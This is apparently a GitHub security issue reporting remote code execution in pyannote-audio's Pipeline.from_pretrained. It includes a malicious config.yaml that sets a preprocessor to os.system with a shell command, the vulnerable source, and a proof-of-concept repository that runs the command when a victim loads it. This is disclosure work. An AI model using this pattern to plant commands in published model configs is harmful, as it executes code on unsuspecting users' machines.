Remote Code Execution via unsafe class instantiation from config.yaml in Pipeline.from_pretrained

Tested versions

version <= 4.0.4

System information

Ubuntu 24.04.2 - pyannote-audio 4.0.4

Issue description

Description

pyannote-audio allows Pipeline.from_pretrained(...) to read a remote config.yaml and instantiate Python callables directly from strings inside that configuration. In particular, the preprocessors section supports a name field that is resolved into a Python object and then called with attacker-controlled parameters. This means a malicious model repository can place an arbitrary callable such as os.system in the config and have it executed during pipeline loading.

For example, an attacker can publish a config like:

preprocessors:
  key:
    name: os.system
    params:
      command: "echo HACKED && touch /tmp/hacked.txt"

When a victim loads the pipeline from that repository, the library resolves os.system and executes it with the supplied arguments. This leads to arbitrary command execution on the victim host during normal model loading.

Root Cause

The vulnerable code in Pipeline.from_pretrained reads preprocessors from the remote config and dynamically resolves and instantiates the specified callable:

pyannote-audio/src/pyannote/audio/core/pipeline.py

Lines 263 to 277 in 78c0d16

    
           if "preprocessors" in config: 
        
               preprocessors = {} 
        
               for key, preprocessor in config.get("preprocessors", {}).items(): 
        
                   # preprocessors: 
        
                   #    key: 
        
                   #       name: package.module.ClassName 
        
                   #       params: 
        
                   #          param1: value1 
        
                   #          param2: value2 
        
                   if isinstance(preprocessor, dict): 
        
                       Klass = get_class_by_name( 
        
                           preprocessor["name"], default_module_name="pyannote.audio" 
        
                       ) 
        
                       params = preprocessor.get("params", {}) 
        
                       preprocessors[key] = Klass(**params)

This is unsafe because preprocessor["name"] is attacker-controlled. If it is set to os.system, then get_class_by_name(...) resolves it and Klass(**params) becomes equivalent to executing:

os.system(command="echo HACKED && touch /tmp/hacked.txt")

The same pattern also appears in pipeline initialization:

pyannote-audio/src/pyannote/audio/core/pipeline.py

Lines 237 to 245 in 78c0d16

    
           # initialize pipeline 
        
           pipeline_name = config["pipeline"]["name"] 
        
           Klass = get_class_by_name( 
        
               pipeline_name, default_module_name="pyannote.pipeline.blocks" 
        
           ) 
        
           params = config["pipeline"].get("params", {}) 
        
           params.setdefault("token", token) 
        
           params.setdefault("cache_dir", cache_dir) 
        
           pipeline = Klass(**params)

This creates a similar risk. Although this path automatically adds token and cache_dir, it still allows attacker-controlled pipeline.name and pipeline.params. If an attacker can identify any callable reachable through get_class_by_name(...) that accepts attacker-controlled arguments and has dangerous side effects, this path can also be abused for code execution or other malicious actions.

The core security issue is that remote YAML configuration is being used to dynamically resolve and execute Python callables without a strict allowlist or an explicit trust boundary.

Proof of Concept

I created a model repository on HuggingFace for demonstration: XManFromXlab/pyannote-audio-pipeline-RCE. A victim only needs to run the normal loading code:

from pyannote.audio import Pipeline

model_id = "XManFromXlab/pyannote-audio-pipeline-RCE"
pipeline = Pipeline.from_pretrained(model_id)

During Pipeline.from_pretrained(...), the library parses config.yaml, resolves os.system through get_class_by_name(...), and immediately executes it with the attacker-supplied command argument. As a result, the victim host prints HACKED and creates /tmp/hacked.txt, demonstrating arbitrary command execution.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Remote Code Execution via unsafe class instantiation from config.yaml in Pipeline.from_pretrained #2000

Tested versions

System information

Issue description

Description

Root Cause

Proof of Concept

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

	if "preprocessors" in config:
	preprocessors = {}
	for key, preprocessor in config.get("preprocessors", {}).items():
	# preprocessors:
	# key:
	# name: package.module.ClassName
	# params:
	# param1: value1
	# param2: value2
	if isinstance(preprocessor, dict):
	Klass = get_class_by_name(
	preprocessor["name"], default_module_name="pyannote.audio"
	)
	params = preprocessor.get("params", {})
	preprocessors[key] = Klass(**params)

	# initialize pipeline
	pipeline_name = config["pipeline"]["name"]
	Klass = get_class_by_name(
	pipeline_name, default_module_name="pyannote.pipeline.blocks"
	)
	params = config["pipeline"].get("params", {})
	params.setdefault("token", token)
	params.setdefault("cache_dir", cache_dir)
	pipeline = Klass(**params)

Remote Code Execution via unsafe class instantiation from config.yaml in Pipeline.from_pretrained #2000

Description

Tested versions

System information

Issue description

Description

Root Cause

Proof of Concept

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions